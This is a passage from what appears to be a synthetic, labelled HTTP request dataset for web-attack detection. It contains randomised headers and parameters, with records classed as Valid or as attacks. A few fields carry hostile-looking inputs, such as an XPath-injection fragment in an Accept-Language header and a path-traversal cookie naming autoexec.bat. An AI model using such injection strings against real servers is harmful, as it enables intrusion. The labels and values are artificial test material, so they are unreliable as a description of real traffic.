Accept-Language: 97  or 1<   y0/9ehmn/h/child::text()[position()=5]     or     35553='] | /* | /foo[bar='
Cache-Control: max-age=7137
Client-ip: 89.227.169.249
Cookie: ameUzdw=4858391;ohnovh1lii=a5JSrr2bsai;lacsvnats9a6=50332;-dLZIimgJErL=haa;lh=854625035
Cookie2: $Version="4"
Date: Fri, 17 Dec 04 21:12:17 UTC
ETag: "FJnd@gDFrU9vaMIl"
Expect: 100-continue
From: aloit2ef@imcvhU.st
If-Modified-Since: Wed, 15 Jul 09 06:30:03 CET
If-Unmodified-Since: Mon, 18 Jul 05 02:31:43 CET
If-Match: "2MDIVp-vpmp3HPHnyD.p"
If-None-Match: "YljhjA4_bsutmLl"
If-Range: Mon, 06 Feb 06 18:26:46 UTC
Max-Forwards: 9024
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: ynsr knAIlgt1=aehksjli
Authorization: idn2 t3g6oh4=t46e
Range: -579124,02412-
Referer: http://heaikr.org/sd0Ihst/2rrmZhcr.mp3
TE: deflate;q=0.1,gzip,trailers
Trailer: Accept-Language
User-Agent: edhihhne8anaiueatao
UA-Color: color32
UA-Pixels: 784x5970
Via: HTTP/9.6 www.bpfa.gif, 0.2 www.5irec.jpg, 9.1 www.NpeEl.html
Transfer-Encoding: deflate
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 17597605220
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48353
Start - Id: 36200
class: PathTransversal
POST /s0DHrPqsJO9jAijx8.php4? HTTP/1.1
Content-Length: 89
Content-Language: icorh
Content-Encoding: deflate
Content-Location: http://www.haaos6.net/ntvehi/tapah.fgf
Content-MD5: bm9lcG5lRWxoc2dPZm93bg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Aug 08 04:31:13 UTC
Last-Modified: Thu, 09 Apr 09 18:22:53 UTC
Host: 128.195.40.125:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: compress;q=0.9, gzip;q=0.5, identity, deflate
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 241.34.128.84
Cookie: wutlri0=\autoexec.bat
Date: Thu, 08 Oct 09 23:07:57 GMT
ETag: W/"Tav.augFKW-kmJDr1"
Expect: rqhE0=aqnjtmp;tenrlaTr
From: ontmsc@ipBcOak9.biz
If-Modified-Since: Sun, 16 Nov 08 23:11:46 GMT
If-Unmodified-Since: Tue, 05 Feb 08 02:53:19 UTC
If-Match: *
If-Range: *
Max-Forwards: 6183
Pragma: 5tCniide='Si5'
Authorization: NTLM aW90ZVRkNGFlaXJ3b2IwckR0bmxzOXRhdXE5b3F3cmVieQ==
Referer: /hWiohe/shhh/8pweuqei.asmx
TE: chunked;q=0.5
User-Agent: Mozilla/2.0 (Windows; U; Win 9x 7.2; wc-oh; rv:8.4.5) Gecko/78450621
UA-Color: color32
Transfer-Encoding: deflate
Upgrade: vssmB/1.3
Warning: 632 8.45.54.106 "ef3nafamtpt2aehn" "Thu, 05 Nov 09 21:58:11 UTC"
----: ------------------------------------

SPATA= d?&Pml7e62hya=13900&O8Xoene=22&hosL=39479948&jxdG6vAfAehLl=p1n68tt?rlike)ehr

End - Id: 36200
Start - Id: 659
class: Valid
GET /xmlDpoT0_MfC5r/sflects7eigpintsn5d/9tagej5wb/oRnenZn6O3qpx/dtced9b/R8p7Exml/oye6lPu0SZlM-EM/5tsa5a5nattvi/@uG2RFQy@htaccesqopenS/acu/sIlMMLMM5V__4PR/dXVU9eqBEPGnzipW.png?ehz=eoe+xsnnusr%25t%2Fad&rhovvltd=258188&eyn3ncm5=noi&samUaWE5A=m&Gi=153 HTTP/1.0
Host: www.cnledosa.ch
Connection: close
Accept: */*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 98.101.91.241
Cookie: eUkotp0@-5=eaaeutj br;eei=i ezaautoexecrpoElrusrj<~tw;ihl6y8s=Efc7h;aeooonarr=u3eT3liblsuensJRU@;noo7ehrhFaureie=3280826
Cookie2: $Version="55"
Date: Mon, 14 Jan 08 12:58:13 CET
ETag: "2QsJTv4yWXY5KaCDdnPp"
Expect: 100-continue
From: i4suSHw@tttnzs.org
If-Modified-Since: Tue, 11 Jan 05 23:23:57 UTC
If-Unmodified-Since: Tue, 22 Apr 08 17:15:44 GMT
If-Match: "mtNOdpehpKaZDLkRTyw"
If-None-Match: "4cs16MsCOVrRK.hs"
If-Range: ".8@ykB2.cM5LOOgCdV"
Max-Forwards: 5
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0eSci"
Authorization: ce50n dga4=7Ujieia
Range: -7,9185-99305,64-211014
Referer: http://taaee0.org/TaSun/thnP/tu20h.exe
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: Expect
User-Agent: zQne (i-WFWJuP4A; l5A2vUIDO; t0bYAu; ql3@qUJu@)
UA-CPU: 68000
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 0578x134
Via: 9.2 www.rNn2nhfs.gif, FTP/1.8 100.54.15.173
Transfer-Encoding: identity
Upgrade: servnt/2.1, oxLrlm/3.0, hnae/0.5, aicd/0.5, uhtthe/3.4
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 541499677250739
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 659
Start - Id: 30357
class: Valid
GET /ighMps/a0c_F4J2d6m.tEAbPriF/n.nwCETKcqs/28Tx@RsVqgQmaqI@/vkzY_k5ns8FxTyhdeo2/tercMeyseadt/1Qoibk/e.PI3vJzVo/ckXX2o/XMw9uXxp_GEbgsoundQt/emaA.png?ynehzabgoFonea8=nuognqo%27et&dngfsrlgstoEayh=dOaeaEiop&chhb=020&yse=805&3G7includeZrmK=nu43&bokrxqEt=s%2F&5rn=corlosteotjc&ooaDwhnaa=tyelEDgiwollro6&2xoC=dau&htm=dawidn&nnrTtXsms9=netcataAOdmrluw%7C5n&io=eAyOaAQKA HTTP/1.1
Host: 18.32.238.250
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: ty5fr='A7eee7te'
Client-ip: 46.149.252.32
Cookie: Esktteo=mmBZDE
Cookie2: $Version="6"
Date: Fri, 04 Dec 09 18:51:34 UTC
ETag: "qF4E9R6gaMKAgEM"
Expect: 100-continue
From: aaS7di@esk6nosXr.cz
If-Modified-Since: Thu, 14 May 09 16:10:48 CET
If-Unmodified-Since: Tue, 25 Mar 08 11:57:50 GMT
If-Match: *
If-None-Match: "eQXWwq@fapxIU8Iok0x"
If-Range: "D8RLbRU1DfmMwodXwm"
Max-Forwards: 586
MIME-Version: 6.0
Pragma: ladegi=oet6e
Proxy-Authorization: NTLM ZHdvbWdUdGVvbnNuZWhtTW51Z3MxdGRubTZMdG9DcklyVGV0aHNiZ25raGV1cmhj
Authorization: Digest cnonce="utiL4p"
Range: 05745-,56-61
Referer: /lstt/lra9hs.doc
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/6.8 (compatible; Konqueror/7.0; Linux i586; n5Eem6P; e3use0r)
UA-CPU: PowerPC
UA-Disp: 011,976,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 033x3612
Via: 7.0 179.136.61.203
Transfer-Encoding: deflate
Upgrade: 8Sts/0.3
Warning: 632 www.rTe2l.html "hcd9dnnAbmuvu5it" "Sun, 10 Sep 06 21:36:43 GMT"
X-Forwarded-For: 179.94.180.111
X-Serial-Number: 4261996881393
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30357
Start - Id: 5275
class: Valid
POST /tzkn1FAMYO3_Rp-X7wG/aTeeuSasr93Hovr/gt/servicesuBconnect9VS3scriptRgC/e6Bn4.ICkpiQ.ipasswd/dPcTfsf5iCK/eoneMiniioor/G9.4-aXCD.bL6/eWmib.bin? HTTP/1.1
Content-Length: 297
Content-Language: nfnsa
Content-Encoding: gzip
Content-Location: /rneSui.jsp
Content-MD5: ZWlhdGEzbmloZWZpZXNSYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 07 Jun 06 14:14:41 CET
Last-Modified: Sat, 16 Dec 06 20:18:56 CET
Host: www.ttuead.org
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: ykhtanut-nTsn2tt, w5et-ei62t, 5reqtud-ldiaa
Cache-Control: min-fresh=62
Client-ip: 125.203.178.102
Cookie: eoroVIaciteaa=atonhEts Enph-u\a;9FCqhtacces=ttoope)4l ;ui=85844
Cookie2: $Version="07"
Date: Sat, 14 Nov 09 12:36:45 GMT
ETag: "UvpAkIIbcnMLfwC4Y8"
Expect: 100-continue
From: anun@nmcev.org
If-Modified-Since: Wed, 27 Jun 07 24:00:18 CET
If-Unmodified-Since: Fri, 02 May 08 02:25:40 UTC
If-Match: "T_HwJimk0mcU2q9VoH8l"
If-None-Match: "WNEVAePnZWrSUMF"
If-Range: "E-@ok5WcNaC5X.BiFS7p"
Max-Forwards: 63
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: sabs4 b0u0a=teeanu
Authorization: Digest opaque="en8rn"
Range: 44-,39-,850121-
Referer: http://www.yhktd.be/hueuga/5ieirni.aspx
TE: chunked
Trailer: Trailer
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 6.8; lt-xn; rv:3.8.9) Gecko/39045618
UA-CPU: PowerPC
UA-Disp: 507,781,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 4414x768
Via: HTTP/1.5 www.mrihaa.css
Transfer-Encoding: euSa6e
Upgrade: 0e36rn/7.2, mnme/4.4, untq/8.6, nvm/5.4, vewas/6.8
Warning: 731 183.237.250.141:0 "tuteLitohsstoT" 
X-Forwarded-For: 178.75.102.4
X-Serial-Number: 76349451666157165
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

dseecsc9t5sheT=hmha&eiast7EaEhaers=1644479&Iinei0ucs6unu=yb13mWllA&y0al9fbwaTmwshU=27875975&siana5=ikw2Rcichee&wS=~4t|&swembta4isiaTHt=miTe1gsElwe&dt2ne5lgaajssas=minputcdSLdene&iuamwnrfifheree=iBt-UdzgTY&cs=jrJfjej6yO6&oah7tguC4nhfb=n23c3ena&Oys6puby=4PeCk2okQ&AaM7vallhttps4=21857500&Oq=eQWH

End - Id: 5275
Start - Id: 20448
class: Valid
GET /sG80p4zov1YuAQ.asp?iaAe=t&ojme6etir=894 HTTP/1.1
Host: www.egtr.net
Connection: close
Accept: */*
Accept-Charset: isiri-3342;q=0.8, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 83.158.227.172
Cookie: iframeJcatVL.d9=65;uohti=5e0n;sqhwiSti9Opoos=iioe
Cookie2: $Version="5"
Date: Tue, 02 Jan 07 06:40:41 UTC
ETag: W/"J5a8UxTuwAtRopVlERn"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Sat, 27 Aug 05 12:54:26 UTC
If-Unmodified-Since: Fri, 04 Feb 05 06:09:41 CET
If-Match: *
If-None-Match: "2hQd.SWSqlMYVgv8HnO"
If-Range: *
Max-Forwards: 60
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic aWJQamVScjpybmVncw==
Authorization: Basic ZW5IZWU6ZHJTd2Vu
Range: -896,61-724379,-171
Referer: /apeoeO1/Alihi2/ellor/yS6Z9se/fhats.php4
TE: trailers,chunked
Trailer: Authorization
User-Agent: angi (ohGLx8; ghHSa12; gNULwuu)
UA-CPU: 68000
UA-Disp: 635,2020,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2799x9300
Via: 6.2 www.aslu.htm, FTP/7.0 51.40.59.234
Transfer-Encoding: identity
Upgrade: zosEe/8.8, bsan/1.2, a3f/0.3, ioths/1.6, ill/1.5
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 17599799085581539
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20448
Start - Id: 8528
class: Valid
GET /yG__tperl/hufL--GS@lR9EO/n0ghdnerafotxgnmcne/u3aeoTi/v@AHtmpOhyD/kpl@hL2/rSiiay/rtdeosSChoei.swf?rnepsjtl1ls=omrhua0srumcke&4ZSl-dropLg1Vqc=paccess_lognullaLiytl%3AhcT&e6r=TNwiatstdtNCfnae&iiiqhnc=siesswuP&Tsnz=9669&edamotxodmiI=eXb.escDK&p1=%27toy&i0dos1inwTow=9276698&usd1i0ooh7jm=edu4c&rn=f&HodBsa4caZ=26649376&oaetoctlwkhsyo=Is5yeswinpsiW&cBrsn=adelete+uat3msz5et&5lSIgd3rF=088&Y6ldleac=%2F%3E HTTP/1.0
Host: www.4efaec8t.ch
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.4, utf-7, x-mac-chinesetrad;q=0.2, x-mac-arabic;q=0.2, x-mac-chinesetrad;q=0.6
Accept-Encoding: *
Accept-Language: n-b, eophe-6;q=0.9, cRh-lmPe;q=0.9, 4tncdm-5inshmn, n-s;q=0.0
Cache-Control: max-age=58
Client-ip: 19.109.17.170
Cookie: ent=99;rtsaItat=89
Cookie2: $Version="6"
Date: Thu, 15 Jul 04 14:45:10 GMT
ETag: "8YHgpBwlJoUbigN5O96q"
Expect: 100-continue
From: laaisi@nHuI4faw.be
If-Modified-Since: Tue, 07 Aug 07 02:10:28 UTC
If-Unmodified-Since: Mon, 27 Nov 06 15:20:34 UTC
If-Match: "7Cju77EbCKx7lUFxLzJ"
If-None-Match: "rEv4sSGoF1t_kO0cTJ"
If-Range: "pTl4E-wTEVK7raRYTKYS"
Max-Forwards: 5584
MIME-Version: 7.7
Pragma: cdumh=ae
Proxy-Authorization: NTLM NTR0RWw4bmhpYmE3YW9zYTJlZXR0dGFyaE14bXJvbkNuaA==
Authorization: Basic cW9oc2l0OjFSaGRs
Range: 288-033,80242-026
Referer: /aX7zca/enet/sf1T/qeqHtho/TAoaeG.pl
TE: trailers,deflate,chunked;q=0.3
Trailer: Accept
User-Agent: e-U6A750 http://www.rytda8r.uk
UA-CPU: 68000
UA-Disp: 7723,577,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 108x957
Via: FTP/5.8 www.iAorsNtn.html
Transfer-Encoding: o5eT; pRe3rct9=dgsraney
Upgrade: enzum/9.9, raa/9.5, wj1sa/0.1, 6mfdam/4.3
Warning: 328 182.117.115.208 "nRgge7dorgtiielaAlw" "Sat, 18 Aug 07 10:39:09 GMT"
X-Forwarded-For: 188.45.28.105
X-Serial-Number: 642382029635717
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 8528
Start - Id: 28072
class: Valid
GET /dwp-@uoai/olH-xGc/casrineestldhdroc6N/2fw0mz7JsZiG/G@Wreplace2b5JBV59/ncn6Otratzst.swf?hr=1051&5.httpUz=rnoopth&FneUtreg9q=f HTTP/1.1
Host: www.peerap.org:80
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=964
Client-ip: 86.135.162.63
Cookie: errdtEhfniirf=txtermse?o;cUEehhexaRlt=7SIl9G7;ilw=ip74-0aGNCuU;reu=4145992
Cookie2: $Version="230"
Date: Thu, 28 Dec 06 13:17:57 UTC
ETag: W/"fSwmJOeGUSAmgxFKO"
Expect: cpyS21t
From: pqmqvnf@tanie.it
If-Modified-Since: Sun, 06 Apr 08 03:09:28 UTC
If-Unmodified-Since: Thu, 22 Mar 07 18:30:38 UTC
If-Match: *
If-None-Match: ".FaB7yQjupRmRRg"
If-Range: *
Max-Forwards: 426
MIME-Version: 4.9
Pragma: nNejtee4='aa4i'
Proxy-Authorization: Basic cmVjaVpycjp0bml4
Authorization: Basic cmFleXBxaDpldWVpbzQ=
Range: -570
Referer: http://Euhsaoe.biz/6snzhVue/gncn/nhmHy/fbeM/1mdrAyt.bin
TE: chunked;q=0.0,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.2 (X11; U; Open BSD i386 0.4; 0z-fg; rv:4.4.3) Gecko/29204050
UA-CPU: StrongARM
UA-Disp: 317,7772,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7806x038
Via: 20dh/0.6 95.236.253.207
Transfer-Encoding: identity
Upgrade: mt50n/6.1, frlaru/6.7
Warning: 726 www.pnttodta.gif:0 "aahHyth7" 
X-Forwarded-For: 97.114.38.28
X-Serial-Number: 981815102258
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28072
Start - Id: 31426
class: Valid
GET /hldnjxe9bya/V@1/eA/hBmpRong/Ep/d55bBxRK2pMi4esY9I/if5P7m43mncf.asmx?Vi5=27&dlierrbgu0ngpax=e%24tcDb6mESac&elzaumtrtnnlru=ecp%7EtinIdxeEedt&cet=iP2SqJQawt&whesnr=heuu&edktpi4on=e6Tr&hrtec5myoihaco=rjH5PTe6&hmkuabjdae=8sWe2_F&aLhithe=iohn5fa5eztis4odsE HTTP/1.1
Host: 138.89.102.36
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: cp-950;q=0.0, shift_jis;q=0.7, x-mac-turkish, windows-1251;q=0.1, x-mac-arabic
Accept-Encoding: identity, identity, gzip
Accept-Language: c-aMtt, eo-grevo;q=0.8, dcRua-rOoiadg
Cache-Control: no-store
Client-ip: 193.41.20.91
Cookie: izeqrrI=8;NkVEC=3;loMoeg8=tqkD;vtszre=izzsu21ya
Cookie2: $Version="5"
Date: Mon, 09 Jul 07 22:28:09 GMT
ETag: W/"vwuPwnzIuRYiFKz6Mt@"
Expect: 100-continue
From: vconid@sswn.net
If-Modified-Since: Mon, 10 Nov 08 24:50:42 GMT
If-Unmodified-Since: Sun, 13 Jul 08 06:23:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 21 Jan 07 11:42:03 CET
Max-Forwards: 70
MIME-Version: 5.4
Pragma: rsa=r
Proxy-Authorization: NTLM dXV2bW9PMmVlZXM1ZWVvaHhocmhld0x0blRpbXZibGpjcnQ=
Authorization: NTLM bGlTY2V1c21hYWVuYmFocHRuaW11aW5yRDJsakRkenJ0Mw==
Range: -723,550-
Referer: http://0tri.org/roer/oeGp/at1pg/x5dtnkh/mnsnT2tt.conf
TE: trailers,trailers
Trailer: Via
User-Agent: o_kVwvR http://www.6na0hB.com
UA-CPU: PowerPC
UA-Disp: 887,1676,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4140x395
Via: aaaf/3.3 www.orntme.jpg
Transfer-Encoding: identity
Upgrade: wptde/7.7, 5sb/8.6
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 102.76.222.209
X-Serial-Number: 886445544
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31426
Start - Id: 32992
class: Valid
POST /el1tCE/eC7sxszaUcW.bO3pf2/DJN9tpp5/cmx/q5GRQyx7@0Big9AAd4Z/system0rLXiO@mvm/k2sXrHC7h0cZT1x.swf? HTTP/1.0
Content-Length: 88
Content-Language: z,fe
Content-Encoding: deflate
Content-Location: /rsacqroa/atet/lrsamg/podoaiyi/poqbaax.msf
Content-MD5: aGFub2hyYnNvZnRldnRtdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 30 Aug 04 11:38:25 UTC
Last-Modified: Fri, 25 Jan 08 09:01:48 CET
Host: www.reifi.gov:36
Connection: close
Accept: video/mpeg;q=0.6, application/postscript;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 59.189.132.168
Cookie: @fNS9xpsvkdH=7294
Cookie2: $Version="2"
Date: Sat, 06 Mar 04 22:28:49 UTC
ETag: W/"@oULZCxj10D19NKVY."
Expect: sefcasnt=neyqhal
From: nxhoo@luihsl.gov
If-Modified-Since: Sun, 27 Dec 09 24:48:16 CET
If-Unmodified-Since: Sun, 03 Jun 07 17:51:14 UTC
If-Match: "i7LM1NzCoU7sB00g5CDL"
If-None-Match: "H27fPTPBjwDes882n6"
If-Range: *
Max-Forwards: 148
MIME-Version: 1.9
Pragma: nrOe=usiie
Proxy-Authorization: hhFHT hdinre=f4edi9s
Authorization: Digest response="76535388aEaeFd62AE674aA6ECBAf689"
Range: 030-05545,617-,-53
Referer: http://ceeub.cz/tigam/mahro/te0rtTc/lboie2t1/disaZAa.rar
TE: trailers,chunked;q=0.3,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 5.7; sr-td; rv:2.4.9) Gecko/34618563
UA-CPU: MIPS
UA-Disp: 0209,118,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 560x481
Via: FTP/7.9 253.238.49.99
Transfer-Encoding: compress
Upgrade: seoh/4.5, k3f0q/5.1
Warning: 960 www.dvr2eom.js:20 "esme5cmn4diad" 
X-Forwarded-For: 225.92.175.53
X-Serial-Number: 75673085046625
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

CJoEnsam.AFV5j=2807212&8opo59tidaa8hn=t-cDhe.7yj&maevnhon=eo&deleteSJfB9= u e&rHace=5585

End - Id: 32992
Start - Id: 22341
class: Valid
GET /aeMtsamc0ktyald/2Yp/rnxwmi/ipYon/e1hT53cjmWeBCjlO2/dWCbD43q2/zFZMA/nDRLFmVR@hM9/imgttU0vyB/NJDISV3.css?sdngcneEt=apNUPJk&eeia=28313&eRelsaheras=%2BoU2axml6Oea&aphht4U4wi=tekt5Qhcaiad&pnsmcvHrn3c=9aSseacl&crs=eSGKcmK&tegeosherosskw=1+between HTTP/1.0
Host: 189.38.36.102
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.0
Accept-Language: i6G5-6, wv-dama
Cache-Control: min-fresh=2230
Client-ip: 186.185.1.249
Cookie: halmbg3slriti=tFrpfZOGy;oer0ck=2839427;mtzeag7tei=sdocumente dUp;lkXM=an(bree@'exec2I;dl6ut=eIRiHbmvrR
Cookie2: $Version="8"
Date: Mon, 14 Sep 09 04:16:15 GMT
ETag: W/"lHVx_e.CMm9IOvVHpR"
Expect: tatnb8n=ndennoq
From: cbgs@ernYenTseb.ch
If-Modified-Since: Sun, 22 Oct 06 05:14:49 UTC
If-Unmodified-Since: Thu, 23 Dec 04 02:40:45 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 13 Apr 04 01:35:02 UTC
Max-Forwards: 879
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM Y2lsaXZtY3JodGlycWRpbXJvbjNrUmVhaGRkbGxob2FzOXNkczI=
Authorization: 44gb hfsyia=qqfnutsr
Range: 562648-,892394-
Referer: http://rSse.cz/5vrs.swf
TE: deflate;q=0.5
Trailer: Accept-Language
User-Agent: gtice6sTlc (t4CH8ToZf; e6dqBUCu; e4DCZk)
UA-CPU: 68000
UA-Disp: 6322,2576,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 254x8392
Via: aeasy/5.7 www.1isrooer.css, FTP/3.8 www.sStTT.jpg, 6.8 www.dq1toiue.tiff
Transfer-Encoding: identity
Upgrade: ujhe/8.0, pws/9.8
Warning: 187 www.lgNd.js "oZ2fltasalsapdudt" "Wed, 22 Oct 08 15:49:21 CET"
X-Forwarded-For: 81.163.55.171
X-Serial-Number: 8809830
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22341
Start - Id: 26081
class: Valid
GET /b2aHss/aE.pl?5ShOzJQdeO=1764&haycero=40359736&fwd=t&gQSscriptetc=eca&eEmn=10821022&4v=dk HTTP/1.1
Host: www.mbnea.de
Connection: close
Accept: application/*
Accept-Charset: us-ascii, iso-8859-3, euc-jp;q=0.5, cp-950, us-ascii
Accept-Encoding: 
Accept-Language: e6hi5o-ewa, n-toen;q=0.7
Cache-Control: max-stale=9268
Client-ip: 104.91.44.192
Cookie: sioRyebjwin=03487999;9Eodusqenkmius=21;rcytKWai5esPids=07083
Cookie2: $Version="409"
Date: Sun, 25 Dec 05 02:57:24 CET
ETag: W/"lc.HWafmi@6sQmMRq"
Expect: Emueor
From: etnehlm@T8emrntb.be
If-Modified-Since: Thu, 19 Feb 09 21:58:34 GMT
If-Unmodified-Since: Mon, 29 May 06 19:33:32 GMT
If-Match: "QinohytBYqjRHGHxZpmf"
If-None-Match: *
If-Range: "qIIBgkhIMAbbeyErKEyy"
Max-Forwards: 4
MIME-Version: 9.3
Pragma: gq1amn='Srt1'
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: s9ata aaorh=do8dwA
Range: -41,2933-4708,1-5204
Referer: http://www.aeimie.st/imwe8fw/cHdk.mdb
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.6 (Machintosh; U; PPC 0.5; Es-ir; rv:0.4.2) Gecko/69555762
UA-CPU: MIPS
UA-Disp: 5226,2357,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 096x0326
Via: FTP/6.3 140.223.91.212:876
Transfer-Encoding: deflate
Upgrade: haa/5.6, myonaa/2.5, aqteer/9.9, eigla/3.2, eeKt/1.9
Warning: 585 13.99.155.61:63 "cectngree" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 2954941169740591
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26081
Start - Id: 24809
class: Valid
GET /tL/dbs2oh/hol/VkoFtelnetuK23R/c3GKYznKsYir7/rC10yTjZjb1Zl/lk4Xt470rTgcXJ-je9fq/nv7e/ZXA4pA5AhTandJZ/WDZ0TbQtdg8M.bin?9siir3t3a1=aohaimgo%2B%7Ccu5Na&bo6qbinFSQ_5j=+U7db&m9Eor4qNobjectnp=uSo2kO0&mIalooco=eXse4heNros&qrmtkaid=623 HTTP/1.0
Host: www.eSrooe.org
Connection: dilh
Accept: */*;q=0.9
Accept-Charset: *;q=0.1
Accept-Encoding: deflate, compress, gzip, deflate
Accept-Language: nnhnlhe-mc, atlcce-dlgGfh;q=0.7
Cache-Control: no-store
Client-ip: 222.92.138.8
Cookie: s5siits8=oscript9i
Cookie2: $Version="951"
Date: Fri, 30 Mar 07 23:21:34 GMT
ETag: W/"3M.kholm9_fIPRMrv"
Expect: xvtn0h5a=soSv
From: iesi0goR@Pnih.ch
If-Modified-Since: Mon, 12 Mar 07 12:08:52 GMT
If-Unmodified-Since: Tue, 24 Feb 04 12:52:34 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 28 Oct 04 20:38:04 UTC
Max-Forwards: 7
MIME-Version: 1.4
Pragma: net='Ehtaseq'
Proxy-Authorization: eavp 4smsS=trdyaIt
Authorization: NTLM bHNCZWh3ZXN1ZWhhYzJ0aG1uc2ZhSXR3cmFFdXV6eXpkZWQ=
Range: -4,93-96
Referer: http://qoiIil.net/alutbahi/plattny.asp
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: oerbotiuN/6.6.8.7.8
UA-CPU: x86
UA-Disp: 1309,0345,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3792x2228
Via: 9.1 185.48.117.188, HTTP/9.3 163.36.210.43, uerr/1.9 51.174.19.139
Transfer-Encoding: sanC2y
Upgrade: uaswsj/5.2
Warning: 242 103.81.240.13 "nIooeeg" "Mon, 29 Aug 05 22:00:16 CET"
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 2608938544154146397
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24809
Start - Id: 26268
class: Valid
GET /asPUKNCrnog/R40/le/yQICGYO/JservicesmbodyKEw/i170I/aomelAs8hointEa1oDuc.jsp?toaotheedise=lpusre+%27prmsd0a+aeexecI HTTP/1.0
Host: 26.16.182.51
Connection: 6gsiohi
Accept: */*;q=0.2
Accept-Charset: iso-8859-2, x-mac-cyrillic, euc-tw;q=0.3
Accept-Encoding: compress;q=0.1, identity, compress, gzip;q=0.0, compress;q=0.9
Accept-Language: *
Cache-Control: min-fresh=5358
Client-ip: 62.36.181.122
Cookie: ruR=4212275;tseT=r<Nyzeeu) where3ito\;gt=241357941;sdlgcoe=1913;YxCNvbscript2=44963
Cookie2: $Version="197"
Date: Sun, 02 May 04 22:00:26 UTC
ETag: W/".hQ9s3.xfe8YI5AQB3"
Expect: omlr=Tr6do;aoome8u=aitwtl
From: ifequ3@tlaennspE.it
If-Modified-Since: Sun, 18 Apr 04 22:14:21 UTC
If-Unmodified-Since: Wed, 29 Dec 04 24:37:37 GMT
If-Match: *
If-None-Match: *
If-Range: "ZrcMvBYQmWVOuH7V8"
Max-Forwards: 6
MIME-Version: 9.2
Pragma: t='eD'
Proxy-Authorization: Digest response="87dB66307E2ef8c477fd16DCFeD9fd69"
Authorization: idsos 4hitG=ialh25e
Range: 25-4659,99-087,512252-95816
